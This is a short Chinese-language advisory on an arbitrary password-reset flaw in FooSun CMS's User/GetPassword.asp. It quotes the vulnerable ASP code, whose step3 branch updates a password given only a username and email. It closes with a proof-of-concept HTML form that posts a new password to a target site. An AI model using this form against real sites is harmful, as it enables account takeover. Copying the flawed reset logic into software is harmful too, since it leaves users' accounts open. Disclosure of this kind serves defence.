风讯（FooSun）GetPassword.asp任意修改密码漏洞

风讯（FooSun）GetPassword.asp任意修改密码漏洞 全文]
影响版本:
FooSun > 5.0漏洞描述:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

在文件\User\ GetPassword.asp中：
ElseIf Request.Form("Action") = "step3" then //第28行
Call step3()
……
Sub step3() //第198行
Dim p_pass_new,p_confim_pass_new
p_pass_new = md5(Request.Form("pass_new"),16)
……
User_Conn.execute("Update FS_ME_Users set UserPassword =''"& NoSqlHack(p_pass_new) &"'' where UserName = ''"& NoSqlHack(StrUserName) &"'' and Email = ''"& NoSqlHack(Replace(Request.Form("Email"),"''''",""))&"''") //第220行
用户可以本地构造表单使程序直接进入修改密码，只需要知道用户名和邮箱。<*参考 
Bug.Center.Team
*>
测试方法:
<form id="form1" name="form1" method="post" action="http://www.sitedir.com.cn(测试网站地址)/User/GetPassword.asp">
<input name="Action" type="text" id="Action" value="step3" />
<input name="pass_new" type="text" id="pass_new" value="123456" />
<input name="confim_pass_new" type="text" id="confim_pass_new" value="123456" />
<input name="Email" type="text" id="Email" value="bb@126.com" />
<input name="UserName" type="text" id="UserName" value="bb" />
<input type="submit" name="Submit" value="提交" />
</form>
